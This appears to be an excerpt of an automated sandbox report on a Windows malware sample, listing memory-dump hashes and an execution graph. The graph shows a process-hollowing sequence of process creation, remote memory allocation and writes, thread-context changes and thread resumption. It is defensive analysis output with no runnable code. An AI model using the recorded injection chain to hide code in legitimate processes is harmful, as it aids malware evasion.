                                              • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                              • Instruction ID: 72a4cb4b4d4ffd363209a2a78df7b131f7379846e1aa41b337488f23517ef9f9
                                              • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                              • Instruction Fuzzy Hash: 7811D376504240DFCB05CF10D9C4B16BF72FB94324F24C5ADD9090B656C33AE956CBA2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8945f01943e2b7e62dc46b646bbfbe509f2be0ead1c789f940255412ce7e9bb5
                                              • Instruction ID: 245fd9cee635c125c6146fb4b097af6fcbc9f49e55173ff0cbc2807a646eb122
                                              • Opcode Fuzzy Hash: 8945f01943e2b7e62dc46b646bbfbe509f2be0ead1c789f940255412ce7e9bb5
                                              • Instruction Fuzzy Hash: C3012D31A002259BCF25EFB985503AE7BF9AB49314F2414BADC09E7701E735C942CBD5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5a239b900ccaa5f5a8c3e36465a3a29b8733af7c13916b5a5dfe7fe51c8ee2db
                                              • Instruction ID: b40c7bfb45317ae7140fb214b31bf15b4c96f1e29cbed654c266e8247aab82c5
                                              • Opcode Fuzzy Hash: 5a239b900ccaa5f5a8c3e36465a3a29b8733af7c13916b5a5dfe7fe51c8ee2db
                                              • Instruction Fuzzy Hash: 51018F74A01249DFDB05EBBCF9516DC7BB2FB80704F0085E9C0059B296EF756B058742
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 42fed8ab9f0fb4542a8ccc53e9adeff2e10c285d91241e3be9ebc70d55311064
                                              • Instruction ID: 157c9c209b736db6f36f3c7ac291bea9cfe6e3d4c3754ca2cde71dafd6f557cb
                                              • Opcode Fuzzy Hash: 42fed8ab9f0fb4542a8ccc53e9adeff2e10c285d91241e3be9ebc70d55311064
                                              • Instruction Fuzzy Hash: 00F01934A01209EFDB45FBBCF991ADD77B5FB84600F1086B8C4059B255EF716A049B92

                                              Execution Graph

                                              Execution Coverage:10%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:375
                                              Total number of Limit Nodes:38
                                              execution_graph 55744 6182f08 55745 6182f1d 55744->55745 55749 6182f48 55745->55749 55754 6182f3a 55745->55754 55746 6182f33 55750 6182f75 55749->55750 55751 6182fdc 55750->55751 55752 6181498 VirtualProtect 55750->55752 55753 61814a0 VirtualProtect 55750->55753 55751->55746 55752->55750 55753->55750 55756 6182f75 55754->55756 55755 6182fdc 55755->55746 55756->55755 55757 6181498 VirtualProtect 55756->55757 55758 61814a0 VirtualProtect 55756->55758 55757->55756 55758->55756 55763 6189fb8 55764 6189fcd 55763->55764 55771 6189ff8 55764->55771 55775 618a325 55764->55775 55779 618a555 55764->55779 55783 618a2dd 55764->55783 55787 6189fe8 55764->55787 55765 6189fe3 55773 618a022 55771->55773 55772 618a317 55772->55765 55773->55772 55791 618b42e 55773->55791 55777 618a04f 55775->55777 55776 618a317 55776->55765 55777->55776 55778 618b42e 10 API calls 55777->55778 55778->55777 55781 618a04f 55779->55781 55780 618a317 55780->55765 55781->55780 55782 618b42e 10 API calls 55781->55782 55782->55781 55785 618a04f 55783->55785 55784 618a317 55784->55765 55785->55784 55786 618b42e 10 API calls 55785->55786 55786->55785 55789 618a022 55787->55789 55788 618a317 55788->55765 55789->55788 55790 618b42e 10 API calls 55789->55790 55790->55789 55792 618b445 55791->55792 55796 618b500 55792->55796 55802 618b563 55792->55802 55797 618b567 55796->55797 55798 618b4e5 55796->55798 55808 618bc00 55797->55808 55840 618bbf0 55797->55840 55872 618bc40 55797->55872 55803 618b580 55802->55803 55805 618bc00 10 API calls 55803->55805 55806 618bc40 10 API calls 55803->55806 55807 618bbf0 10 API calls 55803->55807 55804 618b4e5 55805->55804 55806->55804 55807->55804 55809 618bc15 55808->55809 55905 618c599 55809->55905 55910 618bda7 55809->55910 55915 618bf66 55809->55915 55920 618be26 55809->55920 55925 618bdef 55809->55925 55930 618bfa9 55809->55930 55938 618c928 55809->55938 55943 618c875 55809->55943 55948 618c8b2 55809->55948 55952 618cab0 55809->55952 55957 618c6b0 55809->55957 55962 618c2f0 55809->55962 55970 618c1fd 55809->55970 55975 618c7bb 55809->55975 55980 618be7b 55809->55980 55985 618befa 55809->55985 55990 618ca3a 55809->55990 55998 618c0f8 55809->55998 56003 618c547 55809->56003 56008 618c647 55809->56008 56016 618c803 55809->56016 56021 618c482 55809->56021 56026 618c641 55809->56026 56031 618c08f 55809->56031 56036 618c14d 55809->56036 56041 618be08 55809->56041 56049 618c3d7 55809->56049 56057 618bd55 55809->56057 56062 618c25c 55809->56062 55841 618bc15 55840->55841 55843 618c599 2 API calls 55841->55843 55844 618c25c 2 API calls 55841->55844 55845 618bd55 2 API calls 55841->55845 55846 618c3d7 4 API calls 55841->55846 55847 618be08 4 API calls 55841->55847 55848 618c14d 2 API calls 55841->55848 55849 618c08f 2 API calls 55841->55849 55850 618c641 2 API calls 55841->55850 55851 618c482 2 API calls 55841->55851 55852 618c803 2 API calls 55841->55852 55853 618c647 4 API calls 55841->55853 55854 618c547 2 API calls 55841->55854 55855 618c0f8 2 API calls 55841->55855 55856 618ca3a 4 API calls 55841->55856 55857 618befa 2 API calls 55841->55857 55858 618be7b 2 API calls 55841->55858 55859 618c7bb 2 API calls 55841->55859 55860 618c1fd 2 API calls 55841->55860 55861 618c2f0 4 API calls 55841->55861 55862 618c6b0 2 API calls 55841->55862 55863 618cab0 2 API calls 55841->55863 55864 618c8b2 2 API calls 55841->55864 55865 618c875 2 API calls 55841->55865 55866 618c928 2 API calls 55841->55866 55867 618bfa9 2 API calls 55841->55867 55868 618bdef 2 API calls 55841->55868 55869 618be26 2 API calls 55841->55869 55870 618bf66 2 API calls 55841->55870 55871 618bda7 2 API calls 55841->55871 55842 618bc37 55842->55798 55843->55842 55844->55842 55845->55842 55846->55842 55847->55842 55848->55842 55849->55842 55850->55842 55851->55842 55852->55842 55853->55842 55854->55842 55855->55842 55856->55842 55857->55842 55858->55842 55859->55842 55860->55842 55861->55842 55862->55842 55863->55842 55864->55842 55865->55842 55866->55842 55867->55842 55868->55842 55869->55842 55870->55842 55871->55842 55873 618bc17 55872->55873 55875 618bc4e 55872->55875 55876 618c599 2 API calls 55873->55876 55877 618c25c 2 API calls 55873->55877 55878 618bd55 2 API calls 55873->55878 55879 618c3d7 4 API calls 55873->55879 55880 618be08 4 API calls 55873->55880 55881 618c14d 2 API calls 55873->55881 55882 618c08f 2 API calls 55873->55882 55883 618c641 2 API calls 55873->55883 55884 618c482 2 API calls 55873->55884 55885 618c803 2 API calls 55873->55885 55886 618c647 4 API calls 55873->55886 55887 618c547 2 API calls 55873->55887 55888 618c0f8 2 API calls 55873->55888 55889 618ca3a 4 API calls 55873->55889 55890 618befa 2 API calls 55873->55890 55891 618be7b 2 API calls 55873->55891 55892 618c7bb 2 API calls 55873->55892 55893 618c1fd 2 API calls 55873->55893 55894 618c2f0 4 API calls 55873->55894 55895 618c6b0 2 API calls 55873->55895 55896 618cab0 2 API calls 55873->55896 55897 618c8b2 2 API calls 55873->55897 55898 618c875 2 API calls 55873->55898 55899 618c928 2 API calls 55873->55899 55900 618bfa9 2 API calls 55873->55900 55901 618bdef 2 API calls 55873->55901 55902 618be26 2 API calls 55873->55902 55903 618bf66 2 API calls 55873->55903 55904 618bda7 2 API calls 55873->55904 55874 618bc37 55874->55798 55876->55874 55877->55874 55878->55874 55879->55874 55880->55874 55881->55874 55882->55874 55883->55874 55884->55874 55885->55874 55886->55874 55887->55874 55888->55874 55889->55874 55890->55874 55891->55874 55892->55874 55893->55874 55894->55874 55895->55874 55896->55874 55897->55874 55898->55874 55899->55874 55900->55874 55901->55874 55902->55874 55903->55874 55904->55874 55907 618bd53 55905->55907 55906 618bcc2 55907->55906 56067 6180fa8 55907->56067 56071 6180fb0 55907->56071 55912 618bd53 55910->55912 55911 618bcc2 55912->55911 55913 6180fa8 WriteProcessMemory 55912->55913 55914 6180fb0 WriteProcessMemory 55912->55914 55913->55912 55914->55912 55916 618bd53 55915->55916 55917 618bcc2 55916->55917 55918 6180fa8 WriteProcessMemory 55916->55918 55919 6180fb0 WriteProcessMemory 55916->55919 55918->55916 55919->55916 55921 618bd53 55920->55921 55922 618bcc2 55921->55922 55923 6180fa8 WriteProcessMemory 55921->55923 55924 6180fb0 WriteProcessMemory 55921->55924 55923->55921 55924->55921 55927 618bd53 55925->55927 55926 618bcc2 55927->55926 55928 6180fa8 WriteProcessMemory 55927->55928 55929 6180fb0 WriteProcessMemory 55927->55929 55928->55927 55929->55927 55931 618bfc5 55930->55931 55934 6180fa8 WriteProcessMemory 55931->55934 55935 6180fb0 WriteProcessMemory 55931->55935 55932 618bc37 55932->55798 55933 618bd53 55933->55932 55936 6180fa8 WriteProcessMemory 55933->55936 55937 6180fb0 WriteProcessMemory 55933->55937 55934->55933 55935->55933 55936->55933 55937->55933 55939 618bd53 55938->55939 55940 618bcc2 55939->55940 55941 6180fa8 WriteProcessMemory 55939->55941 55942 6180fb0 WriteProcessMemory 55939->55942 55941->55939 55942->55939 55944 618bd53 55943->55944 55945 618bcc2 55944->55945 55946 6180fa8 WriteProcessMemory 55944->55946 55947 6180fb0 WriteProcessMemory 55944->55947 55946->55944 55947->55944 56075 618e96e 55948->56075 56080 618e970 55948->56080 55949 618c8ca 55953 618bd53 55952->55953 55954 618bcc2 55953->55954 55955 6180fa8 WriteProcessMemory 55953->55955 55956 6180fb0 WriteProcessMemory 55953->55956 55955->55953 55956->55953 55958 618bd53 55957->55958 55959 618bcc2 55958->55959 55960 6180fa8 WriteProcessMemory 55958->55960 55961 6180fb0 WriteProcessMemory 55958->55961 55960->55958 55961->55958 55963 618cd25 55962->55963 55965 618bd53 55962->55965 56093 618e790 55963->56093 56098 618e7a0 55963->56098 55964 618bcc2 55965->55964 55968 6180fa8 WriteProcessMemory 55965->55968 55969 6180fb0 WriteProcessMemory 55965->55969 55968->55965 55969->55965 55971 618bd53 55970->55971 55972 618bcc2 55971->55972 55973 6180fa8 WriteProcessMemory 55971->55973 55974 6180fb0 WriteProcessMemory 55971->55974 55973->55971 55974->55971 55977 618bd53 55975->55977 55976 618bcc2 55977->55976 55978 6180fa8 WriteProcessMemory 55977->55978 55979 6180fb0 WriteProcessMemory 55977->55979 55978->55977 55979->55977 55981 618be93 55980->55981 56103 618d1e8 55981->56103 56108 618d1f8 55981->56108 55982 618beab 55987 618bd53 55985->55987 55986 618bcc2 55987->55986 55988 6180fa8 WriteProcessMemory 55987->55988 55989 6180fb0 WriteProcessMemory 55987->55989 55988->55987 55989->55987 55991 618c3fd 55990->55991 55992 618bd53 55990->55992 56131 61811c8 55991->56131 56135 61811c1 55991->56135 55993 618bcc2 55992->55993 55996 6180fa8 WriteProcessMemory 55992->55996 55997 6180fb0 WriteProcessMemory 55992->55997 55996->55992 55997->55992 56000 618bd53 55998->56000 55999 618bcc2 56000->55999 56001 6180fa8 WriteProcessMemory 56000->56001 56002 6180fb0 WriteProcessMemory 56000->56002 56001->56000 56002->56000 56004 618bd53 56003->56004 56005 618bcc2 56004->56005 56006 6180fa8 WriteProcessMemory 56004->56006 56007 6180fb0 WriteProcessMemory 56004->56007 56006->56004 56007->56004 56009 618cc04 56008->56009 56139 618e838 56009->56139 56144 618e836 56009->56144 56010 618bcc2 56011 618bd53 56011->56010 56014 6180fa8 WriteProcessMemory 56011->56014 56015 6180fb0 WriteProcessMemory 56011->56015 56014->56011 56015->56011 56017 618bd53 56016->56017 56018 618bcc2 56017->56018 56019 6180fa8 WriteProcessMemory 56017->56019 56020 6180fb0 WriteProcessMemory 56017->56020 56019->56017 56020->56017 56023 618bd53 56021->56023 56022 618bcc2 56023->56022 56024 6180fa8 WriteProcessMemory 56023->56024 56025 6180fb0 WriteProcessMemory 56023->56025 56024->56023 56025->56023 56027 618bd53 56026->56027 56027->56026 56028 618bcc2 56027->56028 56029 6180fa8 WriteProcessMemory 56027->56029 56030 6180fb0 WriteProcessMemory 56027->56030 56029->56027 56030->56027 56032 618bd53 56031->56032 56033 618bcc2 56032->56033 56034 6180fa8 WriteProcessMemory 56032->56034 56035 6180fb0 WriteProcessMemory 56032->56035 56034->56032 56035->56032 56038 618bd53 56036->56038 56037 618bcc2 56038->56037 56039 6180fa8 WriteProcessMemory 56038->56039 56040 6180fb0 WriteProcessMemory 56038->56040 56039->56038 56040->56038 56042 618bd53 56041->56042 56043 618cbde 56041->56043 56044 618bcc2 56042->56044 56047 6180fa8 WriteProcessMemory 56042->56047 56048 6180fb0 WriteProcessMemory 56042->56048 56045 618e838 2 API calls 56043->56045 56046 618e836 2 API calls 56043->56046 56045->56042 56046->56042 56047->56042 56048->56042 56050 618c3e1 56049->56050 56053 61811c8 NtResumeThread 56050->56053 56054 61811c1 NtResumeThread 56050->56054 56051 618bd53 56052 618bcc2 56051->56052 56055 6180fa8 WriteProcessMemory 56051->56055 56056 6180fb0 WriteProcessMemory 56051->56056 56053->56051 56054->56051 56055->56051 56056->56051 56059 618bd53 56057->56059 56058 618bcc2 56059->56057 56059->56058 56060 6180fa8 WriteProcessMemory 56059->56060 56061 6180fb0 WriteProcessMemory 56059->56061 56060->56059 56061->56059 56063 618bd53 56062->56063 56064 618bcc2 56063->56064 56065 6180fa8 WriteProcessMemory 56063->56065 56066 6180fb0 WriteProcessMemory 56063->56066 56065->56063 56066->56063 56068 6180ffc WriteProcessMemory 56067->56068 56070 6181095 56068->56070 56070->55907 56072 6180ffc WriteProcessMemory 56071->56072 56074 6181095 56072->56074 56074->55907 56076 618e985 56075->56076 56085 61808ea 56076->56085 56089 61808f0 56076->56089 56077 618e99e 56077->55949 56081 618e985 56080->56081 56083 61808ea Wow64SetThreadContext 56081->56083 56084 61808f0 Wow64SetThreadContext 56081->56084 56082 618e99e 56082->55949 56083->56082 56084->56082 56086 61808f0 Wow64SetThreadContext 56085->56086 56088 61809b1 56086->56088 56088->56077 56090 6180939 Wow64SetThreadContext 56089->56090 56092 61809b1 56090->56092 56092->56077 56094 618e79a 56093->56094 56095 618e7ce 56093->56095 56096 61808ea Wow64SetThreadContext 56094->56096 56097 61808f0 Wow64SetThreadContext 56094->56097 56095->55965 56096->56095 56097->56095 56099 618e7b5 56098->56099 56101 61808ea Wow64SetThreadContext 56099->56101 56102 61808f0 Wow64SetThreadContext 56099->56102 56100 618e7ce 56100->55965 56101->56100 56102->56100 56104 618d20f 56103->56104 56105 618d231 56104->56105 56113 618d56a 56104->56113 56118 618d5df 56104->56118 56105->55982 56109 618d20f 56108->56109 56110 618d56a 2 API calls 56109->56110 56111 618d5df 2 API calls 56109->56111 56112 618d231 56109->56112 56110->56112 56111->56112 56112->55982 56114 618d578 56113->56114 56123 6180538 56114->56123 56127 618052c 56114->56127 56119 618d607 56118->56119 56121 6180538 CreateProcessA 56119->56121 56122 618052c CreateProcessA 56119->56122 56120 618db11 56121->56120 56122->56120 56124 61805b8 CreateProcessA 56123->56124 56126 61807b4 56124->56126 56129 61805b8 CreateProcessA 56127->56129 56130 61807b4 56129->56130 56132 6181211 NtResumeThread 56131->56132 56134 6181268 56132->56134 56134->55992 56136 61811c8 NtResumeThread 56135->56136 56138 6181268 56136->56138 56138->55992 56140 618e84d 56139->56140 56149 6180e48 56140->56149 56153 6180e50 56140->56153 56141 618e86f 56141->56011 56145 618e84d 56144->56145 56147 6180e48 VirtualAllocEx 56145->56147 56148 6180e50 VirtualAllocEx 56145->56148 56146 618e86f 56146->56011 56147->56146 56148->56146 56150 6180e94 VirtualAllocEx 56149->56150 56152 6180f0c 56150->56152 56152->56141 56154 6180e94 VirtualAllocEx 56153->56154 56156 6180f0c 56154->56156 56156->56141 56161 2b07de0 56162 2b07dfa 56161->56162 56163 2b07e0a 56162->56163 56167 6246234 56162->56167 56171 6246e1e 56162->56171 56174 62473f3 56162->56174 56168 6246253 56167->56168 56178 624d008 56168->56178 56173 624d008 VirtualProtect 56171->56173 56172 62401d7 56173->56172 56175 6247412 56174->56175 56177 624d008 VirtualProtect 56175->56177 56176 62401d7 56177->56176 56180 624d02f 56178->56180 56182 624d4e8 56180->56182 56183 624d531 VirtualProtect 56182->56183 56185 624627a 56183->56185 56157 619fca8 56158 619fcf7 NtProtectVirtualMemory 56157->56158 56160 619fd6f 56158->56160 56199 61981e8 56200 61981fd 56199->56200 56203 6198374 56200->56203 56205 619837a 56203->56205 56204 6198497 56205->56204 56206 6181498 VirtualProtect 56205->56206 56207 61814a0 VirtualProtect 56205->56207 56206->56205 56207->56205 55759 624e6b0 55760 624e6f4 VirtualAlloc 55759->55760 55762 624e761 55760->55762 56186 edd030 56187 edd048 56186->56187 56188 edd0a3 56187->56188 56190 624dbd0 56187->56190 56191 624dc29 56190->56191 56194 624e160 56191->56194 56192 624dc5e 56195 624e18d 56194->56195 56196 624d008 VirtualProtect 56195->56196 56198 624e323 56195->56198 56197 624e314 56196->56197 56197->56192 56198->56192

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 166 619fca0-619fd6d NtProtectVirtualMemory 170 619fd6f-619fd75 166->170 171 619fd76-619fdc0 166->171 170->171
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0619FD5D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656832477.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6190000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 2706961497-188254238
                                              • Opcode ID: 554ad0a2a684464e0367e348aafcbd3a66701c90de14e7e9af60d58dac34a00a
                                              • Instruction ID: dcc8fcc9f35f9ebf1f4ea7b01d626470435922da14a0a5c72568df39daaf0d51
                                              • Opcode Fuzzy Hash: 554ad0a2a684464e0367e348aafcbd3a66701c90de14e7e9af60d58dac34a00a
                                              • Instruction Fuzzy Hash: 15419AB9D00258AFCF10CFAAD981ADEFBB5BB49310F14942AE814B7310D735A946CF64

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 186 619fca8-619fd6d NtProtectVirtualMemory 189 619fd6f-619fd75 186->189 190 619fd76-619fdc0 186->190 189->190
                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0619FD5D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656832477.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6190000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 2706961497-188254238
                                              • Opcode ID: 634bf0805cb8b2f4d8dc604f00e316c3c046313ff8f179e438ce31455cced38c
                                              • Instruction ID: 554904e7a0e1d1eec82be99732c612152a8e0015adcfd44c1b85b81da86eb36d
                                              • Opcode Fuzzy Hash: 634bf0805cb8b2f4d8dc604f00e316c3c046313ff8f179e438ce31455cced38c
                                              • Instruction Fuzzy Hash: 7F4168B5D002589FCF10CFAAD980A9EFBB5BB49310F14942AE819B7310D775A946CF64
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 06181256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: cxrl
                                              • API String ID: 947044025-188254238
                                              • Opcode ID: 88e807ef3a4c188019a0b23d71e28ca3d55862441d9e972748704a6be4f75a5c
                                              • Instruction ID: 3143f68188690819fb26a505a3264b6dce53061b1a3a4ead42e12f67a641cf6e
                                              • Opcode Fuzzy Hash: 88e807ef3a4c188019a0b23d71e28ca3d55862441d9e972748704a6be4f75a5c
                                              • Instruction Fuzzy Hash: 4531CDB9D01219AFCB10DFAAD981ADEFBF5BB49310F10942AE415B7300C775A942CF94
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 06181256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: cxrl
                                              • API String ID: 947044025-188254238
                                              • Opcode ID: bd4ab725a35ba9d7dd227e5bfb7bfd1df4c1b767b2de6b4c850cde74a5d2e615
                                              • Instruction ID: c135316a57d1e7929299c56420f3705a89c579fe4d66de19815288fe66655d5c
                                              • Opcode Fuzzy Hash: bd4ab725a35ba9d7dd227e5bfb7bfd1df4c1b767b2de6b4c850cde74a5d2e615
                                              • Instruction Fuzzy Hash: 7F31CEB5D01218DFCB10CFAAD981A9EFBF1BB49310F10842AE414B7300C7756901CF94
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: fb4744c618309b8c7f5da29e7ee70d3c147246834280b53923d5e5e063b53cc0
                                              • Instruction ID: 371d23ffa25e931d7c087925f685652da93ef35a0db2f04d2b0553f4856577de
                                              • Opcode Fuzzy Hash: fb4744c618309b8c7f5da29e7ee70d3c147246834280b53923d5e5e063b53cc0
                                              • Instruction Fuzzy Hash: B1B20835A402299FDB98CFA8C884BADBBF6BF48700F158595E505EB2A5CB70DD81CF50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 4
                                              • API String ID: 0-4088798008
                                              • Opcode ID: e06351844faacf28edf3c8cbc49943b9250142f33b061ea7ef7b870f019a4e6b
                                              • Instruction ID: 93c334944d88c56b0df8d905543d4529fc90470b372e1eea3807c50ba00bf110
                                              • Opcode Fuzzy Hash: e06351844faacf28edf3c8cbc49943b9250142f33b061ea7ef7b870f019a4e6b
                                              • Instruction Fuzzy Hash: 3922EA34A40229CFDB94DFA4C984BADBBF6BF48300F1585A9E509AB395DB709D81CF50
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .z
                                              • API String ID: 0-3598656969
                                              • Opcode ID: 6b6884c048d5ab9e5218a419725349d3d6f4da39cd803d6a31760307a8a5ffc0
                                              • Instruction ID: fb3af27d671ebb6106fc5488a3936342b78372e5a5eb11cc51ad0ee4d08a05ac
                                              • Opcode Fuzzy Hash: 6b6884c048d5ab9e5218a419725349d3d6f4da39cd803d6a31760307a8a5ffc0
                                              • Instruction Fuzzy Hash: B9B13671E01208CFEB54CFA9D884BADBBF2BF89304F5091A9D509E7661DB785985CF04
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e44389f3d56f131ced23a1bb415f6d4157937052f48fa7bd96630012927e3310
                                              • Instruction ID: 306fe9d31d5023c2c4a6d7dee1dae094876b374890deebb47db97647436b28e4
                                              • Opcode Fuzzy Hash: e44389f3d56f131ced23a1bb415f6d4157937052f48fa7bd96630012927e3310
                                              • Instruction Fuzzy Hash: D9A2B375A00228CFDB65CF69C984B99BBB2FF89304F1581E9D509AB365DB319E81CF40
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 99f3e8843aea696ec1254a86eb5ddc83f9df225def1aec6c391efa45f542e64c
                                              • Instruction ID: a7a7e7c421d4435a767570694ebd54d4335b22807baebfbdce0f56e70e195ae2
                                              • Opcode Fuzzy Hash: 99f3e8843aea696ec1254a86eb5ddc83f9df225def1aec6c391efa45f542e64c
                                              • Instruction Fuzzy Hash: 95426F34B40229CFDB94DF68C894A6EBBF2BF89710B1584A9E506CB361DB71DC81CB51
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ca42e5572faa592e7ac6da8f8b0b32d24d3e1b3701b3d806813e9f7b9dd4a2a1
                                              • Instruction ID: db732d661ea399a53b19cdc072b914175d71da7491e591647a5317e3bdbe1e8c
                                              • Opcode Fuzzy Hash: ca42e5572faa592e7ac6da8f8b0b32d24d3e1b3701b3d806813e9f7b9dd4a2a1
                                              • Instruction Fuzzy Hash: FEE10275E06218CFEB14EF69D884BADFBB6FF89304F1080A9D509A7661DB785985CF00
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 862ba04371f3384e99e3b5dcd96a29c9b2d8769f652b71088c22ab313e8a424b
                                              • Instruction ID: 3539087737567f117e4349125161f8085707f9bc593a76155f69231fc3f81bb1
                                              • Opcode Fuzzy Hash: 862ba04371f3384e99e3b5dcd96a29c9b2d8769f652b71088c22ab313e8a424b
                                              • Instruction Fuzzy Hash: 83E1F175D06218CFEB14EF69D884BADFBB2FF88304F1480AAD509A7661DB785985CF00
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 27d94f41d17ea17143801f075257915be474ec9e5889d5b0dfdfd56f661f1c9e
                                              • Instruction ID: def0e3f2811ed19f6ea17d10a12c19488006a8f3519e3ee6007b734cc81f7afc
                                              • Opcode Fuzzy Hash: 27d94f41d17ea17143801f075257915be474ec9e5889d5b0dfdfd56f661f1c9e
                                              • Instruction Fuzzy Hash: C4D1F174A15218CFDB64CF29C884BA9BBF2BF89304F5090A9D50DE7661EB345E84CF14
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656329221.0000000005FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FF0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: dc9311fd6cffa06fc34beeb2318cfc4514677f6776507d8cdda2a4d2ae32c842
                                              • Instruction ID: 53577a5f1e4679609e388e57411870a5c257faa0a4901357953e3d67bff36c9b
                                              • Opcode Fuzzy Hash: dc9311fd6cffa06fc34beeb2318cfc4514677f6776507d8cdda2a4d2ae32c842
                                              • Instruction Fuzzy Hash: FFD1EF75E06218CFEB14EFA9D884BADFBB2FF48304F1084A9D509A7661DB785985CF04
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1657725165.00000000064A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 064A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
